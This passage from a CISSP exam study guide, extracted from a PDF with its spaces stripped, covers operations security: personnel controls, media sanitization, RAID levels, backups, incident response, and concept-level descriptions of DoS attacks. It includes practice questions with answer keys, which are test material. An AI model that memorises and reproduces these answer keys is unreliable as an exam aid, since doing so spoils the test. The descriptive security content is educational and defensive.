3.YouaresurngtheWebviaawirelessnetwork.Yourwirelessconnection
becomesunreliable,soyouplugintoawirednetworktocontinuesurng.
Whileyouchangedphysicalnetworks,yourbrowserrequirednochange.
Whatsecurityfeatureallowsthis?
A.Abstraction
B.Hardwaresegmentation
C.Layering
D.Processisolation

4.Whattypeofsystemrunsmultipleprogramssimultaneouslyonmultiple
CPUs?
A.Multiprocessing
B.Multiprogramming
C.Multitasking
D.Multithreading
5.Ana ackerdeducesthatanorganizationisholdinganositemeetingand
hasfewpeopleinthebuilding,basedonthelowtracvolumetoandfrom
theparkinglot,andusestheopportunitytobreakintothebuildingtosteal
laptops.Whattypeofa ackhasbeenlaunched?
A.Aggregation
B.Emanations
C.Inference
D.MaintenanceHook

ANSWERS
1.Correctanswerandexplanation:D.AnswerDiscorrect;SRAM(Static
RandomAccessMemoryisfastandexpensive,oftenusedforcachememory
includingCPUregisters).
Incorrectanswersandexplanations:A,B,andC.AnswersA,B,andCare
incorrect.DRAMisslowerandlessexpensivethanSRAM,oftenusedasmain
RAM.FirmwareisatechnologyusedbyPLDssuchasEEPROMs.ReadOnly
MemoryisatypeofFirmware,providingnonvolatilememoryforusessuch
astheBIOS.
2.Correctanswerandexplanation:C.AnswerCiscorrect;IaaS
(InfrastructureasaService)providesanentirevirtualizedoperatingsystem,
whichthecustomerconguresfromtheOSonup.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.LaaSisadistracteranswer.SaaS(SoftwareasaService)is

completelycongured,fromtheoperatingsystemtoapplications,andthe
customersimplyusestheapplication.PaaS(PlatformasaService)providesa
preconguredoperatingsystem,andthecustomerconguresthe
applications.
3.Correctanswerandexplanation:C.AnswerCiscorrect;layeringmeansa
changeinonelayer(hardware)hasnodirecteectonanonadjacentlayer
(application).
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Abstractionhidesunnecessarydetailsfromtheuser,whichis
relatedto(butdierent)fromlayering.Hardwaresegmentationprovides
dedicatedhardwareorportionsofhardwaretospecicsecuritydomains.
Processisolationpreventsoneprocessfromaectingthecondentiality,
integrity,oravailabilityofanother.
4.Correctanswerandexplanation:A.AnswerAiscorrect;multiprocessing
systemsrunmultipleprogramsorprocessesperCPU.Twotypesare
SymmetricMultiprocessing(SMP)andAsymmetricMultiprocessing(AMP).
Incorrectanswersandexplanations:B,C,andD.AnswersB,C,andDare
incorrect.AlluseoneCPU.Multiprogrammingrunsmultipleprograms
simultaneouslyononeCPU;multitaskingrunsmultipletaskssimultaneously
ononeCPU,andmultithreadingrunsmultiplethreadssimultaneouslyon
oneCPU.
5.Correctanswerandexplanation:C.AnswerCiscorrect;inferencerequires
ana ackertollintheblanks,anddeducesensitiveinformationfrom
publicinformation.
Incorrectanswersandexplanations:A,B,andD.AnswersA,B,andDare
incorrect.Aggregationisamathematicaloperationwhereallquestionsare
askedandallanswersarereceived:thereisnodeductionrequired.
Emanationsareenergybroadcastfromelectronicequipment.Maintenance
Hooksaresystemmaintenancebackdoorsleftbyvendors.
1

InformationTechnologySecurityEvaluationCriteria.(ITSEC)Provisional

HarmonisedCriteriah p://www.ssi.gouv.fr/site_documents/ITSEC/ITSEC
uk.pdf[accessedJune26,2013].

CHAPTER7

Domain 7: Operations Security

Abstract
ThischapterrepresentsDomain7oftheCISSP,OperationsSecurity.A
signicantemphasisofthedomainandchapterisgeneraladministrative
securityma ers.Keyaspectsofadministrativesecurityincludedata
classication,separationofduties,rotationofduties,nondisclosure
agreements(NDA),andbackgroundchecks.Anotherfocusofthisdomainis
onassetmanagement,whichincludesconsiderationofbothconguration
andchangemanagement.Continuityofoperationsisalsopresentedinthis
chapterwithdiscussionsofdierentmethodstryingtoensureavailability
throughhighlyavailablesystems,RedundantArrayofInexpensiveDisks
(RAID),andServiceLevelAgreements(SLA).Amethodologyanddiscussion
aboutincidentresponseisthenalfocusoftheOperationsSecuritydomain.

KEYWORDS
Collusion;Subject;Object;Label;Fullbackup;Incrementalbackup;
Dierentialbackup;Clearance;Remanence;RedundantArrayofInexpensive
Disks(RAID);Mirroring;Striping

Exam Objectives in This Chapter

AdministrativeSecurity
SensitiveInformation/MediaSecurity
AssetManagement
ContinuityofOperations

IncidentResponseManagement

Introduction
Operationssecurityisconcernedwiththreatstoaproductionoperating
environment.Threatagentscanbeinternalorexternalactors,andoperations
securitymustaccountforbothofthesethreatsourcesinordertobeeective.
Operationssecurityisaboutpeople,data,media,hardware,andthethreats
associatedwitheachoftheseinaproductionenvironment.

ADMINISTRATIVE SECURITY
Afundamentalaspectofoperationssecurityisensuringthatcontrolsarein
placetoinhibitpeopleeitherinadvertentlyorintentionallycompromisingthe
condentiality,integrity,oravailabilityofdataorthesystemsandmedia
holdingthatdata.Administrativesecurityprovidesthemeanstocontrol
peoplesoperationalaccesstodata.
Labels

Objectshavelabelsandsubjectshaveclearances.Theobjectlabelsusedby
manyworldgovernmentsarecondential,secret,andtopsecret.According
toExecutiveOrder12356NationalSecurityInformation,
topsecretshallbeappliedtoinformation,theunauthorizeddisclosureof
whichreasonablycouldbeexpectedtocauseexceptionallygravedamageto
thenationalsecurity.
secretshallbeappliedtoinformation,theunauthorizeddisclosureof
whichreasonablycouldbeexpectedtocauseseriousdamagetothenational
security.
condentialshallbeappliedtoinformation,theunauthorizeddisclosure
ofwhichreasonablycouldbeexpectedtocausedamagetothenational
security.

PrivatesectorcompaniesuselabelssuchasInternalUseOnlyand
CompanyProprietary.
Clearance

Aclearanceisadeterminationconcerningwhetherornotausercanbetrusted

withaspeciclevelofinformation.Clearancesmustdeterminethesubjects
currentandpotentialfuturetrustworthiness;thela erisharder(andmore
expensive)toassess.Arethereanyissues,suchasdebtordrugoralcohol
abuse,whichcouldleadanotherwiseethicalpersontoviolatetheirethics?Is
thereapersonalsecretthatcouldbeusedtoblackmailthisperson?Some
higherlevelclearancesincludeaccesstocompartmentedinformation.
Compartmentalizationisatechnicalmethodforenforcingneedtoknow.
Separation of duties

Separationofduties(alsocalledsegregationofduties)allowsanorganizationto
maintainchecksandbalancesamongtheemployeeswithprivilegedaccess.
Byhavingmorethanoneindividualperformpartofasensitivetransaction,
eachpersoninvolvedissupervisingtheotherwhenaccessisgrantedand
used.Noonepersonshouldhavetotalcontrolofasensitivetransaction.As
therolebecomesmoresensitive,separationofdutiesshouldbeimplemented
morestringently.Forexample,administrationofanuclearweaponssystem
shouldrequiremanypeoplesoversightandcompletionofduties.
Rotation of duties

Rotationofdutiesdescribesaprocessthatrequiresdierentstamembersto
performthesameduty.Byrotatingthosestamembers,theorganization
protectsitselfbyhavingthesevaryingstamembersperformandreviewthe
workoftheirpeerswhoperformedthesameworkduringthelastrotation.
Rotationofdutieshelpsmitigatecollusion,wheretwoormorepeoplework
tosubvertthesecurityofasystem.Rotationofdutiescanserveasaeither
detectiveordeterrentcontrol:thefearofbeingcaughtmaydetersomeone
fromcommi ingfraud;therotationmaydetectfraudthathasalready
occurred.
Mandatory leave/forced vacation

Anadditionaloperationalcontrolthatiscloselyrelatedtorotationofdutiesis
thatofmandatoryleave,alsoknownasforcedvacation.Thoughthereare
variousjusticationsforrequiringemployeestobeawayfromwork,the
primarysecurityconsiderationsaresimilartothataddressedbyrotationof
duties,reducingordetectingpersonnelsinglepointsoffailure,anddetection
anddeterrenceoffraud.
Nondisclosure agreement

Anondisclosureagreement(NDA)isaworkrelatedcontractualagreementthat
ensuresthat,priortobeinggivenaccesstosensitiveinformationordata,an
individualororganizationappreciatestheirlegalresponsibilitytomaintain
thecondentialityofsensitiveinformation.Jobcandidates,consultants,or
contractorsoftensignnondisclosureagreementsbeforetheyarehired.
Nondisclosureagreementsarelargelyadirectivecontrol.
Background checks

Backgroundchecks(alsoknownasbackgroundinvestigationsor
preemploymentscreening)areanadditionaldirectivecontrol.Themajorityof
backgroundinvestigationsareperformedaspartofapreemployment
screeningprocess.Someorganizationsperformcursorybackground
investigationsthatincludeacriminalrecordcheck.Othersperformmorein
depthchecks,suchasverifyingemploymenthistory,obtainingcreditreports,
andinsomecasesrequiringthesubmissionofadrugscreening.

SENSITIVE INFORMATION/MEDIA SECURITY

Thoughsecurityandcontrolsrelatedtothepeoplewithinanenterpriseare
vitallyimportant,soishavingaregimentedprocessforhandlingsensitive
information,includingmediasecurity.Thissectiondiscussesconceptsthat
areanimportantcomponentofastrongoverallinformationsecurityposture.
Sensitive information

Sensitiveinformationrequiresprotection,andthatinformationphysically
residesonsomeformofmedia.Inadditiontoprimarystorage,backup
storagemustalsobeconsidered.Itisalsolikelythatsensitiveinformationis
transferred,whetherinternallyorexternally,foruse.Whereverthedata
exists,theremustbeprocessesthatensurethedataisnotdestroyedor
inaccessible(abreachofavailability),disclosed(abreachofcondentiality),
oraltered(abreachofintegrity).
Labeling/marking

Perhapsthemostimportantstepinmediasecurityistheprocessoflocating
sensitiveinformationandlabelingormarkingitassensitive.Howthedatais
labeledshouldcorrespondtotheorganizationaldataclassicationscheme.
Handling

Peoplehandlingsensitivemediashouldbetrustedindividualswhohave

beenve edbytheorganization.Theymustunderstandtheirroleinthe
organizationsinformationsecurityposture.Sensitivemediashouldhave
strictpoliciesregardingitshandling.Policiesshouldrequiretheinclusionof
wri enlogsdetailingthepersonresponsibleforthemedia.Historically,
backupmediahasposedasignicantproblemfororganizations.
Storage

Whenstoringsensitiveinformation,itispreferabletoencryptthedata.
Encryptionofdataatrestgreatlyreducesthelikelihoodofthedatabeing
disclosedinanunauthorizedfashionduetomediasecurityissues.Physical
storageofthemediacontainingsensitiveinformationshouldnotbe
performedinahaphazardfashion,whetherthedataisencryptedornot.
Retention

Mediaandinformationhavealimitedusefullife.Retentionofsensitive
informationshouldnotpersistbeyondtheperiodofusefulnessorlegal
requirement(whicheverisgreater),asitneedlesslyexposesthedatato
threatsofdisclosurewhenthedataisnolongerneededbytheorganization.
Keepinmindtheremayberegulatoryorotherlegalreasonsthatmaycompel
theorganizationtomaintainsuchdataforkeepingdatabeyonditstimeof
utility.
Media sanitization or destruction of data

Whilesomedatamightnotbesensitiveandnotwarrantthoroughdata
destructionmeasures,anorganizationwillhavedatathatmustbeveriably
destroyedorotherwiserenderednonusableincasethemediaonwhichitwas
housedisrecoveredbyathirdparty.Theprocessforsanitizationofmediaor
destructionofdatavariesdirectlywiththetypeofmediaandsensitivityof
data.
Data remanence

Dataremanenceisdatathatpersistsbeyondnoninvasivemeanstodeleteit.
Thoughdataremanenceissometimesusedspecicallytorefertoresidual
datathatpersistsonmagneticstorage,remanenceconcernsgobeyondjust
thatofmagneticstoragemedia.
Wiping, overwriting, or shredding

Inmostlesystems,ifauserdeletesale,thelesystemmerelyremoves

metadatapointersorreferencestothele.Theleallocationtablereferences
areremoved,buttheledataitselfremains.Signicantamountsofdeleted
datamayberecovered(undeleted);forensictoolsarereadilyavailabletodo
so.Reforma ingalesystemmayalsoleavedataintact.
Thoughsimpledeletionoflesorreforma ingofharddisksisnotsucient
torenderdataunrecoverable,lesmaybesecurelywipedoroverwri en.
Wiping,alsocalledoverwritingorshredding,writesnewdataovereachbitor
blockofledata.Oneoftheshortcomingsofwipingiswhenharddisks
becomephysicallydamaged,preventingthesuccessfuloverwritingofall
data.
Degaussing

Byintroducinganexternalmagneticeldthroughuseofadegausser,thedata
onmagneticstoragemediacanbemadeunrecoverable.Adegausserdestroys
theintegrityofthemagnetizationofthestoragemediaitself,makingthedata
unrecoverable.
Physical destruction

Physicaldestruction,whencarriedoutproperly,isconsideredthemost
securemeansofmediasanitization.Oneofthereasonsforthehigherdegree
ofassuranceisbecauseofthegreaterlikelihoodoferrorsresultingindata
remanencewithwipingordegaussing.Physicaldestructioniswarrantedfor
themostsensitiveofdata.Commonmeansofdestructioninclude
incinerationandpulverization.
Shredding

Asimpleformofmediasanitizationisshredding,atypeofphysical
destruction.Thoughthistermissometimesusedinrelationtooverwritingof
data,hereshreddingreferstotheprocessofmakingdataprintedonhard
copy,oronsmallerobjectssuchasoppyoropticaldisks,unrecoverable.
Sensitiveinformationsuchasprintedinformationneedstobeshreddedprior
todisposalinordertothwartadumpsterdivinga ack.Dumpsterdivingisa
physicala ackinwhichapersonrecoverstrashinhopesofndingsensitive
informationthathasnotbeensecurelyerasedordestroyed.

ASSET MANAGEMENT
Aholisticapproachtooperationalinformationsecurityrequires

organizationstofocusonsystemsaswellasthepeople,data,andmedia.
Systemssecurityisanothervitalcomponenttooperationssecurity,andthere
arespeciccontrolsthatcangreatlyhelpsystemsecuritythroughoutthe
systemslifecycle.
Configuration management

Basiccongurationmanagementpracticesassociatedwithsystemsecuritywill
involvetaskssuchasdisablingunnecessaryservices;removingextraneous
programs;enablingsecuritycapabilitiessuchasrewalls,antivirus,and
intrusiondetectionorpreventionsystems;andtheconguratingsecurityand
auditlogs.
Baselining

Securitybaseliningistheprocessofcapturingapointintimeunderstandingof
thecurrentsystemsecurityconguration.Establishinganeasymeansfor
capturingthecurrentsystemsecuritycongurationcanbeextremelyhelpful
inrespondingtoapotentialsecurityincident.
Vulnerability management

Vulnerabilityscanningisawaytodiscoverpoorcongurationsandmissing
patchesinanenvironment.Thetermvulnerabilitymanagementisusedrather
thanjustvulnerabilityscanningtoemphasizetheneedformanagementofthe
vulnerabilityinformation.Theremediationormitigationofvulnerabilities
shouldbeprioritizedbasedonbothrisktotheorganizationandeaseof
remediationprocedures.
Zero-day vulnerabilities and zero-day exploits

Azerodayvulnerabilityisavulnerabilitythatisknownbeforetheexistence
ofapatch.Zerodayvulnerabilities,alsocommonlywri en0day,arebecoming
increasinglyimportantasa ackersarebecomingmoreskilledindiscovery,
anddisclosureofzerodayvulnerabilitiesisbeingmonetized.Azeroday
exploit,ratherthanvulnerability,referstotheexistenceofexploitcodefora
vulnerabilitythathasyettobepatched.
Change management

Inordertomaintainconsistentandknownoperationssecurity,aregimented
changemanagementorchangecontrolprocessneedstobefollowed.The
purposeofthechangecontrolprocessistounderstand,communicate,and

documentanychangeswiththeprimarygoalofbeingabletounderstand,
control,andavoiddirectorindirectnegativeimpactthatthechangemight
impose.

FastFacts
Becauseofthevariabilityofthechangemanagementprocess,specic
namedphaseshavenotbeenoeredinthissection.However,thegeneral
owofthechangemanagementprocessincludes:
Identifyingachange
Proposingachange
Assessingtheriskassociatedwiththechange
Testingthechange
Schedulingthechange
Notifyingimpactedpartiesofthechange
Implementingthechange
Reportingresultsofthechangeimplementation

Allchangesmustbecloselytrackedandauditable.Adetailedchangerecord
shouldbekept.Somechangescandestabilizesystemsorcauseother
problems;changemanagementauditingallowsoperationsstatoinvestigate
recentchangesintheeventofanoutageorproblem.Auditrecordsalsoallow
auditorstoverifythatchangemanagementpoliciesandprocedureshave
beenfollowed.

CONTINUITY OF OPERATIONS
Continuityofoperationsisprincipallyconcernedwiththeavailabilityportion
ofthecondentiality,integrity,andavailabilitytriad.
Service-Level Agreements

Service-Level Agreements

AServiceLevelAgreement(SLA)stipulatesallexpectationsregardingthe
behaviorofthedepartmentororganizationthatisresponsibleforproviding
servicesandthequalityoftheservicesprovided.Often,ServiceLevel
Agreementswilldictatewhatisconsideredacceptableregardingthingssuch
asbandwidth,timetodelivery,responsetimes,etc.
Fault tolerance

Inorderforsystemsandsolutionswithinanorganizationtobeableto
continuallyprovideoperationalavailability,theymustbeimplementedwith
faulttoleranceinmind.Availabilitynotonlyissolelyfocusedonsystem
uptimerequirementsbutalsorequiresthatdatabeaccessibleinatimely
fashion.
Backup

Inorderfordatatobeabletoberecoveredincaseofafault,someformof
backuporredundancymustbeprovided.Thoughmagnetictapemediais
quiteanoldtechnology,itisstillthemostcommonrepositoryofbackupdata.
Thethreebasictypesofbackupsare:fullbackup,incrementalbackup,and
dierentialbackup.
Full

Thefullbackupisareplicaofallallocateddataonaharddisk.Becauseofthe
largeramountofmedia,andthereforecostofmedia,andthelongerbackup
windowrequirements,fullbackupsareoftencoupledwitheitherincremental
ordierentialbackupstobalancethetimeandmediaconsiderations.
Incremental and di erential

Incrementalbackupsonlyarchivelesthathavechangedsincethelast
backupofanykindwasperformed.Dierentialbackupswillarchiveanyles
thathavebeenchangedsincethelastfullbackup.

D i d Yo u K n o w ?
AssumeafullbackupisperformedeverySunday,andeitherincremental
ordierentialbackupsareperformeddailyfromMondaytoSaturday.
DataislostafterWednesdaysbackup.

Ifincrementaldailybackupswereusedinadditiontotheweeklyfull
backup,thetapesfromSunday,Monday,Tuesday,andWednesday
wouldbeneededtorecoverallarchiveddata.
Ifdierentialbackupswereusedinadditiontothefullweeklybackup,
onlytheSundayandWednesdaytapeswouldbeneeded.

Redundant Array of Inexpensive Disks

Evenifonlyonefullbackuptapeisneededforrecoveryofasystemduetoa
harddiskfailure,thetimetorecoveralargeamountofdatacaneasilyexceed
therecoverytimedictatedbytheorganization.ThegoalofaRedundantArray
ofInexpensiveDisks(RAID)istohelpmitigatetheriskassociatedwithhard
diskfailures.TherearevariousRAIDlevelsthatconsistofdierent
approachestodiskarraycongurations.

FastFacts
ThreecriticalRAIDtermsare:mirroring,striping,andparity.
Mirroringachievesfulldataredundancybywritingthesamedatato
multipleharddisks.
Stripingfocusesonincreasingreadandwriteperformancebyspreading
dataacrossmultipleharddisks.Writescanbeperformedinparallelacross
multipledisksratherthanseriallyononedisk.Thisparallelization
providesaperformanceincreaseanddoesnotaidindataredundancy.
Parityachievesdataredundancywithoutincurringthesamedegreeof
costasthatofmirroringintermsofdiskusageandwriteperformance.

RAID 0: Striped set

RAID0employsstripingtoincreasetheperformanceofreadandwrites.
StripingoersnodataredundancysoRAID0isapoorchoiceifrecoveryof

dataiscritical.Figure7.1showsRAID0.

FIGURE7.1 RAID0:stripedset.

RAID 1: Mirrored set

RAID1creates/writesanexactduplicateofalldatatoanadditionaldisk.The
writeperformanceisdecreased,thoughthereadperformancecanseean
increase.Figure7.2showsRAID1.

FIGURE7.2 RAID1:mirroredset.

RAID 2: Hamming code

RAID2isalegacytechnologythatrequireseither14or39harddisksanda
speciallydesignedhardwarecontroller,whichmakesRAID2cost
prohibitive.RAID2stripesatthebitlevel.

E x a m Wa r n i n g
WhiletheabilitytoquicklyrecoverfromadiskfailureisagoalofRAID,
therearecongurationsthatdonothavereliabilityasacapability.Forthe

exam,understandthatnotallRAIDcongurationsprovideadditional
reliability.

RAID 3: Striped set with dedicated parity (byte level)

Stripingisdesirableduetotheperformancegainsassociatedwithspreading
dataacrossmultipledisks.However,stripingaloneisnotasdesirabledueto
thelackofredundancy.WithRAID3,data,atthebytelevel,isstripedacross
multipledisks,butanadditionaldiskisleveragedforstorageofparity
information,whichisusedforrecoveryintheeventofafailure.
RAID 4: Striped set with dedicated parity (block level)

RAID4providesthesamefunctionalityasRAID3butstripesdataatthe
block,ratherthanbyte,level.LikeRAID3,RAID4employsadedicated
paritydriveratherthanhavingparitydatadistributedamongalldisks,asin
RAID5.
RAID 5: Striped set with distributed parity

OneofthemostpopularRAIDcongurationsisthatofRAID5,stripedset
withdistributedparity.LikeRAIDs3and4,RAID5writesparityinformation
thatisusedforrecoverypurposes.RAID5writesattheblocklevel,likeRAID
4.However,unlikeRAIDs3and4,whichrequireadedicateddiskforparity
information,RAID5distributestheparityinformationacrossmultipledisks.
OneofthereasonsforRAID5spopularityisthatthediskcostfor
redundancyislowerthanthatofamirroredset.RAID5allowsfordata
recoveryintheeventthatanyonediskfails.Figure7.3showsRAID5.

FIGURE7.3 RAID5:stripedsetwithdistributedparity.

RAID 6: Striped set with dual distributed parity

RAID 6: Striped set with dual distributed parity

WhileRAID5accommodatesthelossofanyonedriveinthearray,RAID6
canallowforthefailureoftwodrivesandstillfunction.Thisredundancyis
achievedbywritingthesameparityinformationtotwodierentdisks.
RAID 1+0 or RAID 10

RAID1+0orRAID10isanexampleofwhatisknownasnestedRAIDor
multiRAID,whichsimplymeansthatonestandardRAIDlevelis
encapsulatedwithinanother.WithRAID10,whichisalsocommonlywri en
asRAID1+0toexplicitlyindicatethenesting,thecongurationisthatofa
stripedsetofmirrors.

CrunchTime
Table7.1providesabriefdescriptionofthevariousRAIDlevelsthatare
mostcommonlyused.
Table7.1
RAIDLevels

RAIDLevel

Description

RAID0

Blocklevelstripedset

RAID1

Mirroredset

RAID3

Bytelevelstripingwithdedicatedparity

RAID4

Blocklevelstripingwithdedicatedparity

RAID5

Blocklevelstripingwithdistributedparity

RAID6

Blocklevelstripingwithdualdistributedparity

System redundancy

Thoughredundancyandresiliencyofdata,providedbyRAIDandbackup

solutions,areimportant,furtherconsiderationneedstobegiventothe
systemsthemselvesthatprovideaccesstothisredundantdata.
Redundant hardware and redundant systems

Manysystemscanprovideinternalhardwareredundancyofcomponentsthat
areextremelypronetofailure.Themostcommonexampleofthisinbuilt
redundancyissystemsordevicesthathaveredundantonboardpowerinthe
eventofapowersupplyfailure.Sometimes,systemssimplyhaveeld
replaceablemodularversionsofcommonlyfailingcomponents.Though
physicallyreplacingapowersupplymightincreasedowntime,havingan
inventoryofsparemodulestoservicetheentiredatacentersserverswouldbe
lessexpensivethanhavingallserversconguredwithaninstalledredundant
powersupply.
Redundantsystems(akaalternativesystems)makeentiresystemsavailablein
caseoffailureoftheprimarysystem.
High-availability clusters

Ahighavailabilitycluster(alsocalledafailovercluster)usesmultiplesystems
thatarealreadyinstalled,congured,andpluggedin,suchthatifafailure
causesoneofthesystemstofailthentheothercanbeseamlesslyleveragedto
maintaintheavailabilityoftheserviceorapplicationbeingprovided.
EachmemberofanactiveactiveHAclusteractivelyprocessesdatainadvance
ofafailure.Thisiscommonlyreferredtoasloadbalancing.Havingsystems
inanactiveactive,orloadbalancing,congurationistypicallymorecostly
thanhavingthesystemsinanactivepassive,orhotstandby,congurationin
whichthebackupsystemsonlybeginprocessingwhenafailureisdetected.

INCIDENT RESPONSE MANAGEMENT

Asecurityincidentisaharmfuloccurrenceonasystemornetwork.All
organizationswillexperiencesecurityincidents.Incidentresponse
managementisaregimentedandtestedmethodologyforidentifyingand
respondingtotheseincidents.
AComputerSecurityIncidentResponseTeam(CSIRT)isthegrouptaskedwith
monitoring,identifying,andrespondingtosecurityincidents.Thegoalofthe
incidentresponseplanistoallowtheorganizationtocontrolthecostand

damageassociatedwithincidentsandtomaketherecoveryofimpacted
systemsquicker.
Methodology

Figure7.4isfromtheNISTSpecialPublication80061:ComputerSecurity
IncidentHandlingGuide(seeh p://csrc.nist.gov/publications/nistpubs/800
61rev2/SP80061rev2.pdf),whichoutlinestheincidentresponselifecyclein
foursteps:
1.Preparation
2.Detectionandanalysis
3.Containment,eradication,andrecovery
4.Postincidentactivity

FIGURE7.4 NISTIncidentResponseLifecycle.

Manyincidenthandlingmethodologiestreatcontainment,eradication,and
recoveryasthreedistinctsteps,aswewillinthisbook.Othernamesforeach
steparesometimesused;hereisthesixsteplifecyclewewillfollow,with
alternatenameslisted:
1.Preparation
2.Detectionandanalysis(akaidentication)
3.Containment
4.Eradication
5.Recovery
6.Lessonslearned(akapostincidentactivity,postmortem,orreporting)

Itisimportanttorememberthatthenalstepfeedsbackintotherststep,as
shownpreviouslyinFigure7.4.Anorganizationmaydeterminethatsta
wereinsucientlytrainedtohandleincidentsduringlessonslearnedphase.
Thatlessonisthenappliedtocontinuedpreparation,wherestawouldbe
properlytrained.
Preparation

Thepreparationphaseincludesstepstakenbeforeanincidentoccurs.These
includetraining,writingincidentresponsepoliciesandprocedures,and
providingtoolssuchaslaptopswithsningsoftware,crossovercables,
originalOSmedia,removabledrives,etc.Preparationshouldinclude
anythingthatmayberequiredtohandleanincidentorthatwillmake
incidentresponsefasterandmoreeective.
Detection and analysis

Detection(alsocalledidentication)isthephasewhereeventsareanalyzedin
ordertodeterminewhethertheycompriseasecurityincident.Aneventis
anyauditableactiononasystemornetwork(suchasaserverrebootorauser
loggingintocheckemail).Anincidentisaharmfulevent(suchasadenialof
servicea ackthatcrashesaserver).
Containment

Thecontainmentphaseisthepointatwhichtheincidentresponseteam
a emptstokeepfurtherdamagefromoccurringasaresultoftheincident.
Containmentmightincludetakingasystemothenetwork,isolatingtrac,
poweringothesystem,orotheritemstocontrolboththescopeandseverity
oftheincident.Thisphaseisalsotypicallywhereabinary(bitbybit)forensic
backupismadeofsystemsinvolvedintheincident.
Eradication

Theeradicationphaseinvolvestwosteps:removinganymalicioussoftware
fromacompromisedsystemandunderstandingthecauseoftheincidentso
thatthesystemcanbereliablycleanedandsafelyrestoredtooperational
statuslaterintherecoveryphase.Inorderforanorganizationtoreliably
recoverfromanincident,thecausemustbedeterminedsothatthesystemsin
questioncanbereturnedtoaknowngoodstatewithoutriskofcompromise
persistingorreoccurring.
Recovery

Therecoveryphaseinvolvescautiouslyrestoringthesystemorsystemsto
operationalstatus.Typically,thebusinessunitresponsibleforthesystemwill
dictatewhenthesystemwillgobackonline.Considerthepossibilitythatthe
infectionmighthavepersistedthroughtheeradicationphase.Forthisreason,
closemonitoringofthesystemafteritisreturnedtoproductionisnecessary.
Lessons learned

Unfortunately,thelessonslearnedphase(alsoknownaspostincidentactivity,
reporting,orpostmortem)islikelytobeneglectedinimmatureincident
responseprograms.Thisfactisunfortunatebecausethelessonslearned
phase,ifdoneright,isthephasethathasthegreatestpotentialtoeecta
positivechangeinsecurityposture.Thegoalofthelessonslearnedphaseisto
provideanalreportontheincident,whichwillbedeliveredto
management.
Feedbackfromthisphasefeedsdirectlyintocontinuedpreparation,where
thelessonslearnedareappliedtoimprovepreparationforhandlingfuture
incidents.
Types of attacks

Thissectionwillprovidebasicinformationonthetypesofa acksmore
commonlyexperiencedandrespondedtoinorganizations.
Session hijacking and MITM

Sessionhijackingcompromisesanexistingnetworksession,sometimesseizing
controlofit.OlderprotocolssuchasTelnetmaybevulnerabletosession
hijacking.
AManintheMiddle(MITM,alsocalledMonkeyintheMiddle)a ackplaces
thea ackerbetweenthevictimandanothersystem:thea ackersgoalisto
beabletoserveasanundiscoveredproxyforeitherorbothoftwoendpoints
engagingincommunication.Encryptedcommunicationsthatprovidemutual
endpointauthenticationcanmitigatebothsessionhijackingandMITM.
Malware

Malware,ormaliciouscode/software,representsoneofthebestknowntypes
ofthreatstoinformationsystems.Therearenumeroustypesofmalware,
somedetailedinTable7.2,thathaveevolvedovertheyearstocontinually

causestresstooperations.
Table7.2
TypesofMalware

Malicious
Code
Virus

Description
Avirusismalwarethatdoesnotselfpropagate:itrequiresa
carrier,suchasahumanmanuallymovinganinfected
USBdevicefromonesystemtoanother

Macro
virus

AmacrovirusismalwarethatinfectsMicrosoftOffice
documentsbymeansofembeddingmaliciousmacros
withinthem

Worm

Awormismalwarethatselfpropagates.Someofthemost
wellknownnamesofmalwarefallundertheworm
category:CodeRed,Nimda,SQLSlammer,Blaster,
MyDoom,andWitty

Trojan
Horse

ATrojanHorseismalwarethathastwofunctions:oneovert
(suchasagame)andonecovert(suchasprovidingan
attackerwithpersistentbackdooraccess)

Rootkit

Arootkitismalwarethatviolatessystemintegrityandis
focusedonhidingfromsystemadministrators.Typical
capabilitiesincludefile,folder,process,andnetwork
connectionhiding

Denial of Service and Distributed Denial of Service

DenialofService(DoS)isaonetooneavailabilitya ack;DistributedDenialof
Service(DDoS)isamanytooneavailabilitya ack.DoSa ackscomeinall
shapesandsizes,rangingfromthoseinvolvingonespeciallycraftedpacket
andavulnerablesystemtoseethatpackettoDDoSa acksthatleveragetens
ofthousands(ormore)ofbotstotargetanonlineserviceproviderwitha
oodofseeminglylegitimatetraca emptingtooverwhelmtheircapacity.

Table7.3includeshistoricalexamplesofmaliciouspacketa acksaswellas
somegeneralresourceexhaustion,orooding,techniques.

Table7.3
DenialofServiceExamples

DoSName

Type

Description

Land

Malformed

ThelandattackusesaspoofedSYN

packet

packetthatincludesthevictim'sIP
addressasbothsourceand
destination

Smurf

Resource
exhaustion

ASmurfattackinvolvesICMPflooding.
TheattackersendsICMPEcho
Requestmessageswithspoofed
sourceaddressesofthevictimtothe
directedbroadcastaddressofa
networkknowntobeaSmurfamplifier.
ASmurfamplifierisapublicfacing
networkthatsendsalargenumberof
responsesfromtrafficsenttodirected
broadcastaddresses

SYNFlood

Resource
exhaustion

ASYNFloodsendsmanyTCPpackets
withtheSYNflagsettoavictimand
ignoresthevictim'sSYN/ACKpackets.
Thevictim'shalfopenconnection
queuemayeventuallyfillandbe
unabletoprocessnewconnections

Teardrop

Malformed

Theteardropattacksendspacketswith

packet

overlappingfragmentoffsets,which
maycrashthesystemthatis
attemptingtoreassemblethe
fragments

Pingof
Death

Malformed
packet

ThePingofDeathsendsfragmented
ICMPEchoRequeststhat,once
reassembled,arelargerthanthe
maximumsizeofanIPpacket

Fraggle

Resource

TheFraggleattackisavariationofthe

exhaustion

Smurfattack.WhileSmurfusesICMP,
fraggleusesUDP

DNS

ADNSreflectionattacksendshigh

reflection

numbersofDNSrequestsspoofed
fromthevictimtopubliclyaccessible
recursiveDNSnameservers

Summary of exam objectives

Inthischapter,wehavediscussedoperationssecurity.Operationssecurity
concernsthesecurityofsystemsanddatawhilebeingactivelyusedina
productionenvironment.Ultimately,operationssecurityisaboutpeople,
data,media,andhardware;allofwhichareelementsthatneedtobe
consideredfromasecurityperspective.Thebesttechnicalsecurity
infrastructureintheworldwillberenderedmootifanindividualwith
privilegedaccessdecidestoturnagainsttheorganizationandthereareno
preventiveordetectivecontrolsinplacewithintheorganization.

TOP FIVE TOUGHEST QUESTIONS

1.Whatisthebestwaytodestroyelectronicdata?
A.Degaussing
B.Bitleveloverwrite
C.Destruction
D.Forma ing
2.WhichlevelofRAIDstripesdataacrossmultipledisksatthebytelevel?
A.RAID2
B.RAID3
C.RAID4

D.RAID5
3.Whichprincipleinvolvesdeningatrustedsecuritybaselineimageof
criticalsystems?
A.Congurationmanagement
B.Changemanagement
C.Patchmanagement
D.Vulnerabilitymanagement
